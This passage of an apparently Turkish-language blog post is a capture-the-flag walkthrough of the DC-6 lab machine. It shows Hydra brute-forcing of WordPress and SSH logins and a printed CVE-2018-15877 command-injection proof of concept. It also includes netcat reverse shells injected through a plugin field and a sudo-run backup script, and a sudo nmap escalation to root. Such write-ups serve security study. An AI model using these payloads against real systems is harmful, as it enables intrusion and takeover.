\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# export HYDRA_PROXY_HTTP                                                                                                                                                          \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# hydra -L users -P passwords.txt 192.168.31.109 http-post-form &quot;\/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log+In&amp;2F&amp;testcookie=1:The password you entered&quot;  \nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-06-23 15:29:52\n[INFO] Using HTTP Proxy: http:\/\/127.0.0.1:8080\n[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n^C\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# rm .\/hydra.restore                                                                                                                                                                                                                  130 \u2a2f\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# hydra -L users -P passwords.txt 192.168.31.109 http-post-form &quot;\/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log+In&amp;2F&amp;testcookie=1:The password you entered&quot; \nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-06-23 15:30:08\n[INFO] Using HTTP Proxy: http:\/\/127.0.0.1:8080\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 13340 login tries (l:5\/p:2668), ~834 tries per task\n[DATA] attacking http-post-form:\/\/192.168.31.109:80\/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log+In&amp;2F&amp;testcookie=1:The password you entered\n[STATUS] 1351.00 tries\/min, 1351 tries in 00:01h, 11989 to do in 00:09h, 16 active\n[STATUS] 1374.33 tries\/min, 4123 tries in 00:03h, 9217 to do in 00:07h, 16 active\n[80][http-post-form] host: 192.168.31.109   login: mark   password: helpdesk01\n[STATUS] 1461.71 tries\/min, 10232 tries in 00:07h, 3108 to do in 00:03h, 16 active\n[STATUS] 1446.50 tries\/min, 11572 tries in 00:08h, 1768 to do in 00:02h, 16 active\n[STATUS] 1436.56 tries\/min, 12929 tries in 00:09h, 411 to do in 00:01h, 16 active\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-06-23 15:39:26\n<\/code><\/pre>\n<p>WordPress'in i\u00e7ine girdikten sonra <strong>Activity Monitor<\/strong> isimli bir plugin g\u00f6rd\u00fcm. Kullan\u0131c\u0131n\u0131n yetkisi yoktu bende plugin'e y\u00f6neldim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# searchsploit activity monitor\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nActivity Monitor 2002 2.6 - Remote Denial of Service                                                                                                                                                        | windows\/dos\/22690.c\nRedHat Linux 6.0\/6.1\/6.2 - &#039;pam_console&#039; Monitor Activity After Logout                                                                                                                                      | linux\/local\/19900.c\nWordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection                                                                                                                    | php\/webapps\/45274.html\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# locate php\/webapps\/45274.html\n\/usr\/share\/exploitdb\/exploits\/php\/webapps\/45274.html\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# cat \/usr\/share\/exploitdb\/exploits\/php\/webapps\/45274.html\n&lt;!--\nAbout:\n===========\nComponent: Plainview Activity Monitor (WordPress plugin)\nVulnerable version: 20161228 and possibly prior\nFixed version: 20180826\nCVE-ID: CVE-2018-15877\nCWE-ID: CWE-78\nAuthor:\n- LydA(c)ric Lefebvre (https:\/\/www.linkedin.com\/in\/lydericlefebvre)\n\nTimeline:\n===========\n- 2018\/08\/25: Vulnerability found\n- 2018\/08\/25: CVE-ID request\n- 2018\/08\/26: Reported to developer\n- 2018\/08\/26: Fixed version\n- 2018\/08\/26: Advisory published on GitHub\n- 2018\/08\/26: Advisory sent to bugtraq mailing list\n\nDescription:\n===========\nPlainview Activity Monitor WordPress plugin is vulnerable to OS\ncommand injection which allows an attacker to remotely execute\ncommands on underlying system. Application passes unsafe user supplied\ndata to ip parameter into activities_overview.php.\nPrivileges are required in order to exploit this vulnerability, but\nthis plugin version is also vulnerable to CSRF attack and Reflected\nXSS. Combined, these three vulnerabilities can lead to Remote Command\nExecution just with an admin click on a malicious link.\n\nReferences:\n===========\nhttps:\/\/github.com\/aas-n\/CVE\/blob\/master\/CVE-2018-15877\/\n\nPoC:\n--&gt;\n\n&lt;html&gt;\n  &lt;!--  WordPress Plainview Activity Monitor RCE\n        [+] Version: 20161228 and possibly prior\n        [+] Description: Combine OS Commanding and CSRF to get reverse shell\n        [+] Author: LydA(c)ric LEFEBVRE\n        [+] CVE-ID: CVE-2018-15877\n        [+] Usage: Replace 127.0.0.1 &amp; 9999 with you ip and port to get reverse shell\n        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well\n  --&gt;\n  &lt;body&gt;\n  &lt;script&gt;history.pushState(&#039;&#039;, &#039;&#039;, &#039;\/&#039;)&lt;\/script&gt;\n    &lt;form action=&quot;http:\/\/localhost:8000\/wp-admin\/admin.php?page=plainview_activity_monitor&amp;tab=activity_tools&quot; method=&quot;POST&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n      &lt;input type=&quot;hidden&quot; name=&quot;ip&quot; value=&quot;google.fr| nc -nlvp 127.0.0.1 9999 -e \/bin\/bash&quot; \/&gt;\n      &lt;input type=&quot;hidden&quot; name=&quot;lookup&quot; value=&quot;Lookup&quot; \/&gt;\n      &lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; \/&gt;\n    &lt;\/form&gt;\n  &lt;\/body&gt;\n&lt;\/html&gt;                              <\/code><\/pre>\n<p>Harika! Hadi deneyelim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# cat exploit.html \n&lt;html&gt;\n  &lt;!--  WordPress Plainview Activity Monitor RCE\n        [+] Version: 20161228 and possibly prior\n        [+] Description: Combine OS Commanding and CSRF to get reverse shell\n        [+] Author: LydA(c)ric LEFEBVRE\n        [+] CVE-ID: CVE-2018-15877\n        [+] Usage: Replace 127.0.0.1 &amp; 9999 with you ip and port to get reverse shell\n        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well\n  --&gt;\n  &lt;body&gt;\n  &lt;script&gt;history.pushState(&#039;&#039;, &#039;&#039;, &#039;\/&#039;)&lt;\/script&gt;\n    &lt;form action=&quot;http:\/\/wordy\/wp-admin\/admin.php?page=plainview_activity_monitor&amp;tab=activity_tools&quot; method=&quot;POST&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n      &lt;input type=&quot;hidden&quot; name=&quot;ip&quot; value=&quot;google.fr| nc 192.168.31.102 9999 -e \/bin\/bash&quot; \/&gt;\n      &lt;input type=&quot;hidden&quot; name=&quot;lookup&quot; value=&quot;Lookup&quot; \/&gt;\n      &lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; \/&gt;\n    &lt;\/form&gt;\n  &lt;\/body&gt;\n&lt;\/html&gt;  \n<\/code><\/pre>\n<p>Dinleme noktam\u0131 ba\u015flatt\u0131m ve http server kurup istek att\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# python3 -m http.server \nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...\n127.0.0.1 - - [23\/Jun\/2021 15:46:43] &quot;GET \/ HTTP\/1.1&quot; 200 -\n127.0.0.1 - - [23\/Jun\/2021 15:46:44] &quot;GET \/exploit.html HTTP\/1.1&quot; 200 -\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# nc -lvp 9999                                                                                                 1 \u2a2f\nlistening on [any] 9999 ...\nconnect to [192.168.31.102] from wordy [192.168.31.109] 35522\nls\nabout.php\nadmin-ajax.php\nadmin-footer.php\nadmin-functions.php\nadmin-header.php\nadmin-post.php\nadmin.php\nasync-upload.php\ncomment.php\ncredits.php\ncss\ncustom-background.php\ncustom-header.php\ncustomize.php\nedit-comments.php\nedit-form-advanced.php\nedit-form-blocks.php\nedit-form-comment.php\nedit-link-form.php\nedit-tag-form.php\nedit-tags.php\nedit.php\nexport.php\nfreedoms.php\nimages\nimport.php\nincludes\nindex.php\ninstall-helper.php\ninstall.php\njs\nlink-add.php\nlink-manager.php\nlink-parse-opml.php\nlink.php\nload-scripts.php\nload-styles.php\nmaint\nmedia-new.php\nmedia-upload.php\nmedia.php\nmenu-header.php\nmenu.php\nmoderation.php\nms-admin.php\nms-delete-site.php\nms-edit.php\nms-options.php\nms-sites.php\nms-themes.php\nms-upgrade-network.php\nms-users.php\nmy-sites.php\nnav-menus.php\nnetwork\nnetwork.php\noptions-discussion.php\noptions-general.php\noptions-head.php\noptions-media.php\noptions-permalink.php\noptions-reading.php\noptions-writing.php\noptions.php\nplugin-editor.php\nplugin-install.php\nplugins.php\npost-new.php\npost.php\npress-this.php\nprivacy.php\nprofile.php\nrevision.php\nsetup-config.php\nterm.php\ntheme-editor.php\ntheme-install.php\nthemes.php\ntools.php\nupdate-core.php\nupdate.php\nupgrade-functions.php\nupgrade.php\nupload.php\nuser\nuser-edit.php\nuser-new.php\nusers.php\nwidgets.php\npwd\n\/var\/www\/html\/wp-admin\nwhoami\nwww-data<\/code><\/pre>\n<p>Evet i\u00e7erdeyiz. Bunun \u00fczerine i\u00e7eride incelemeler yapmaya ba\u015flad\u0131m. WordPress oldu\u011fu i\u00e7in db parolas\u0131n\u0131 elde ettim ancak bir \u015fiime yaramad\u0131... Ama incelemelerim esnas\u0131nda bilin\u00e7li yap\u0131lm\u0131\u015f bir grup i\u015flemi g\u00f6rd\u00fcm. Bu i\u015fimize yarayabilir.<\/p>\n<pre><code class=\"language-sh\">graham@dc-6:\/home$ cat \/etc\/group\nroot:x:0:\ndaemon:x:1:\nbin:x:2:\nsys:x:3:\nadm:x:4:\ntty:x:5:\ndisk:x:6:\nlp:x:7:\nmail:x:8:\nnews:x:9:\nuucp:x:10:\nman:x:12:\nproxy:x:13:\nkmem:x:15:\ndialout:x:20:\nfax:x:21:\nvoice:x:22:\ncdrom:x:24:\nfloppy:x:25:\ntape:x:26:\nsudo:x:27:\naudio:x:29:\ndip:x:30:\nwww-data:x:33:\nbackup:x:34:\noperator:x:37:\nlist:x:38:\nirc:x:39:\nsrc:x:40:\ngnats:x:41:\nshadow:x:42:\nutmp:x:43:\nvideo:x:44:\nsasl:x:45:\nplugdev:x:46:\nstaff:x:50:\ngames:x:60:\nusers:x:100:\nnogroup:x:65534:\nsystemd-journal:x:101:\nsystemd-timesync:x:102:\nsystemd-network:x:103:\nsystemd-resolve:x:104:\nsystemd-bus-proxy:x:105:\ninput:x:106:\ncrontab:x:107:\nnetdev:x:108:\nmessagebus:x:109:\nssh:x:110:\nmysql:x:111:\nssl-cert:x:112:\ngraham:x:1001:\nmark:x:1002:\nsarah:x:1003:\njens:x:1004:\ndevs:x:1005:jens,graham\n<\/code><\/pre>\n<p><strong>devs:x:1005:jens,graham<\/strong> bunun notunu ald\u0131m. Daha sonrqa\u0131nda graham kullan\u0131c\u0131s\u0131n\u0131n parolas\u0131n\u0131 bir txt dosyas\u0131nda buldum.<\/p>\n<pre><code class=\"language-sh\">pwd\n\/home\nls\ngraham\njens\nmark\nsarah\ncd mark\nls\nstuff\ncd stuff\nls\nthings-to-do.txt\ncat things-to-do.txt\nThings to do:\n\n- Restore full functionality for the hyperdrive (need to speak to Jens)\n- Buy present for Sarah&#039;s farewell party\n- Add new user: graham - GSo7isUM1D4 - done\n- Apply for the OSCP course\n- Buy new laptop for Sarah&#039;s replacement<\/code><\/pre>\n<p>hydra ile arka planda ssh bruteforce ba\u015flatm\u0131\u015ft\u0131m. Bunu duraklat\u0131p a\u015fa\u011f\u0131daki gibi do\u011frulama i\u015flemi ger\u00e7ekle\u015ftirdim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# hydra -L users -p GSo7isUM1D4 ssh:\/\/192.168.31.109                                                         130 \u2a2f\nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-06-23 17:24:41\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (l:5\/p:1), ~1 try per task\n[DATA] attacking ssh:\/\/192.168.31.109:22\/\n[22][ssh] host: 192.168.31.109   login: graham   password: GSo7isUM1D4\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-06-23 17:24:43\n<\/code><\/pre>\n<p>\u015eimdi ssh ile ba\u011flanal\u0131m. Ba\u011flant\u0131 kurduktan sonra <strong>jens<\/strong> kullan\u0131c\u0131s\u0131n\u0131n alt\u0131nda bir sh dosyas\u0131 buldum. Ancak gruba dikkat edin.<\/p>\n<pre><code class=\"language-sh\">graham@dc-6:\/home\/jens$ ls -l\ntotal 4\n-rwxrwxr-x 1 jens devs 50 Apr 26  2019 backups.sh<\/code><\/pre>\n<p>Bu dosya \u00fczerinde de\u011fi\u015fiklikler yapabiliyoruz. Ayr\u0131ca jens kullan\u0131c\u0131 haklar\u0131nda bu dosyay\u0131 \u00e7al\u0131\u015ft\u0131rabiliyoruz. Hadi jens olal\u0131m.<\/p>\n<pre><code class=\"language-sh\">graham@dc-6:\/home\/jens$ sudo -l\nMatching Defaults entries for graham on dc-6:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser graham may run the following commands on dc-6:\n    (jens) NOPASSWD: \/home\/jens\/backups.sh<\/code><\/pre>\n<p>A\u015fa\u011f\u0131daki gibi dosyay\u0131 sudo'lu ve sudo'suz \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131mda farklar\u0131 g\u00f6rebilirsiniz.<\/p>\n<pre><code class=\"language-sh\">graham@dc-6:\/home\/jens$ cat backups.sh \n#!\/bin\/bash\ntar -czf backups.tar.gz \/var\/www\/html\nwhoami<\/code><\/pre>\n<p>Dosyaya whoami sat\u0131r\u0131n\u0131 ekledim ve \u00e7al\u0131\u015ft\u0131rd\u0131m.<\/p>\n<pre><code class=\"language-sh\">graham@dc-6:\/home\/jens$ .\/backups.sh \ntar: Removing leading `\/&#039; from member names\ntar (child): backups.tar.gz: Cannot open: Permission denied\ntar (child): Error is not recoverable: exiting now\ntar: backups.tar.gz: Cannot write: Broken pipe\ntar: Child returned status 2\ntar: Error is not recoverable: exiting now\ngraham<\/code><\/pre>\n<pre><code class=\"language-sh\">graham@dc-6:\/home\/jens$ sudo -u jens \/home\/jens\/backups.sh\ntar: Removing leading `\/&#039; from member names\njens\n<\/code><\/pre>\n<p>Hadi jens ile bir kabuk a\u00e7al\u0131m.<\/p>\n<pre><code class=\"language-sh\">graham@dc-6:\/home\/jens$ cat backups.sh \n#!\/bin\/bash\ntar -czf backups.tar.gz \/var\/www\/html\nwhoami\nnc 192.168.31.102 2222 -e \/bin\/bash\n<\/code><\/pre>\n<p>Dosyay\u0131 yukar\u0131daki gibi de\u011fi\u015ftirip kendimde bir dinleme noktas\u0131 ba\u015flatt\u0131m.<\/p>\n<pre><code class=\"language-sh\">graham@dc-6:\/home\/jens$ sudo -u jens \/home\/jens\/backups.sh\ntar: Removing leading `\/&#039; from member names\njens\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# nc -lvp 2222                      \nlistening on [any] 2222 ...\nconnect to [192.168.31.102] from wordy [192.168.31.109] 53092\npython -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\njens@dc-6:~$ \n<\/code><\/pre>\n<p>Harika! \u0130\u00e7eride gezinirken garip bir \u015fey fark ettim.<\/p>\n<pre><code class=\"language-sh\">jens@dc-6:~$ sudo -l\nsudo -l\nMatching Defaults entries for jens on dc-6:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser jens may run the following commands on dc-6:\n    (root) NOPASSWD: \/usr\/bin\/nmap\n<\/code><\/pre>\n<p>\u0130nternet \u00fczerinde k\u00fc\u00e7\u00fck bir ara\u015ft\u0131rma yaparak <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/nmap\/\">https:\/\/gtfobins.github.io\/gtfobins\/nmap\/<\/a> adresinde g\u00fczel bir \u00f6rnek buldum ve uygulad\u0131m.<\/p>\n<pre><code class=\"language-sh\">jens@dc-6:~$ TF=$(mktemp)\nTF=$(mktemp)\njens@dc-6:~$ echo &#039;os.execute(&quot;\/bin\/sh&quot;)&#039; &gt; $TF\necho &#039;os.execute(&quot;\/bin\/sh&quot;)&#039; &gt; $TF\njens@dc-6:~$ sudo nmap --script=$TF\nsudo nmap --script=$TF\n\nStarting Nmap 7.40 ( https:\/\/nmap.org ) at 2021-06-24 07:08 AEST\nNSE: Warning: Loading &#039;\/tmp\/tmp.VHdps5lLEV&#039; -- the recommended file extension is &#039;.nse&#039;.\n# whoami\nroot\n# cd \/root\n# ls\ntheflag.txt\n# cat theflag.txt\n\nYb        dP 888888 88     88         8888b.   dP&quot;Yb  88b 88 888888 d8b \n Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P \n  YbdPYbdP   88&quot;&quot;   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88&quot;&quot;   `&quot;&#039; \n   YP  YP    888888 88ood8 88ood8     8888Y&quot;   YbodP  88  Y8 888888 (8) \n\nCongratulations!!!\n\nHope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those\nwho have provided feedback, and who have taken time to complete these little\nchallenges.\n\nIf you enjoyed this CTF, send me a tweet via @DCAU7.\n<\/code><\/pre>\n<p>Kendime not: <a href=\"https:\/\/gtfobins.github.io\/\">https:\/\/gtfobins.github.io\/<\/a> adresideki bilgileri acil yedekle!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like: 192.168.0.142 wordy&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/23\/dc-6\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">DC: 6<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[182,504,527],"class_list":["post-1237","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-nmap","tag-sudo","tag-wordpress-pluggin","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1237","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1237"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1237\/revisions"}],"predecessor-version":[{"id":1238,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1237\/revisions\/1238"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1237"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1237"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1237"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}